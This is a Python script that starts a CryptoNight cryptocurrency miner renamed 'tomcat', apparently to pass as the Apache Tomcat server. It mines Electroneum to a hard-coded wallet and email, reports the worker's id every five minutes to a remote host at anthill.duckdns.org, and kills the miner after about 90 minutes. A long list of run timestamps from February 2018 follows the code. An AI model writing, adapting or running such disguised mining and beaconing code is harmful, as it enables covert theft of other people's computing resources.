import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:45:08.699652
#2018-02-17 16:37:01.708873
#2018-02-17 18:25:03.907174
#2018-02-17 20:14:02.068231
#2018-02-17 22:02:05.134291
#2018-02-17 23:46:01.883071
#2018-02-18 01:35:07.201399
#2018-02-18 03:22:01.397869
#2018-02-18 05:10:01.428298
#2018-02-18 07:02:05.811002
#2018-02-18 08:49:06.036968
#2018-02-18 10:36:04.096175
#2018-02-18 12:21:06.579975
#2018-02-18 14:08:01.734141
#2018-02-18 15:58:03.644291
#2018-02-18 17:48:03.343549
#2018-02-18 19:36:06.257386
#2018-02-18 21:21:05.718749
#2018-02-18 23:09:03.744834
#2018-02-19 00:56:01.995723
#2018-02-19 02:43:05.437935
#2018-02-19 04:30:03.032755
#2018-02-19 06:15:03.403180
#2018-02-19 08:03:07.194587
#2018-02-19 09:53:07.443106
#2018-02-19 11:42:06.677178
#2018-02-19 13:29:04.004317
#2018-02-19 15:17:06.090017
#2018-02-19 17:04:10.185522
#2018-02-19 18:51:07.226596
#2018-02-19 20:29:05.764385
#2018-02-19 22:17:04.130684
#2018-02-20 00:04:05.062911
#2018-02-20 01:51:04.424192
#2018-02-20 03:41:08.953971
#2018-02-20 05:27:05.311263
#2018-02-20 07:11:06.805931
#2018-02-20 08:57:05.334981
#2018-02-20 10:41:04.784170
#2018-02-20 12:27:06.755436
#2018-02-20 14:14:06.068088
#2018-02-20 15:58:07.412097
#2018-02-20 17:44:02.084065
#2018-02-20 19:34:09.592952
#2018-02-20 21:20:08.482782
#2018-02-20 23:06:02.206861
#2018-02-21 00:51:05.673114
#2018-02-21 02:36:04.100898
#2018-02-21 04:24:01.826594
#2018-02-21 06:11:06.696343
#2018-02-21 07:56:08.001040
#2018-02-21 09:42:06.879448
#2018-02-21 11:31:05.274246
#2018-02-21 13:18:10.678341
#2018-02-21 15:05:12.978969
#2018-02-21 16:54:15.207966
#2018-02-21 18:40:10.946262
#2018-02-21 20:25:01.462102
#2018-02-21 22:13:05.358329
#2018-02-22 00:02:02.193859
#2018-02-22 01:49:06.738801
#2018-02-22 03:38:07.057997
#2018-02-22 05:25:01.399659
#2018-02-22 07:10:06.414684
#2018-02-22 08:56:07.722671
#2018-02-22 10:44:01.711191
#2018-02-22 12:31:09.498721
#2018-02-22 14:15:02.101223
#2018-02-22 16:02:01.821142
#2018-02-22 17:49:04.744174
#2018-02-22 19:35:07.361879
#2018-02-22 21:27:06.511744
#2018-02-22 23:13:05.819791
#2018-02-23 00:58:07.923364
#2018-02-23 02:47:07.695906
#2018-02-23 04:34:06.342218
#2018-02-23 06:19:03.896612
#2018-02-23 08:06:05.454429
#2018-02-23 10:20:09.429065
#2018-02-23 12:14:01.644929
#2018-02-23 14:01:06.253249
#2018-02-23 15:53:06.796881
#2018-02-23 17:38:08.564319
#2018-02-23 19:24:06.613676
#2018-02-23 21:08:09.293786
#2018-02-23 22:52:03.730210
#2018-02-24 00:43:05.417944
#2018-02-24 02:35:04.627368
#2018-02-24 04:28:06.006198
#2018-02-24 06:15:06.273865
#2018-02-24 08:03:06.076791
#2018-02-24 09:47:06.297419
#2018-02-24 11:43:04.019346
#2018-02-24 13:34:06.358082
#2018-02-24 15:22:06.014314
#2018-02-24 17:12:06.086304
#2018-02-24 19:03:03.498242
#2018-02-24 20:52:07.359528
#2018-02-24 23:17:04.208731
#2018-02-25 02:41:08.180969
#2018-02-25 06:32:01.463710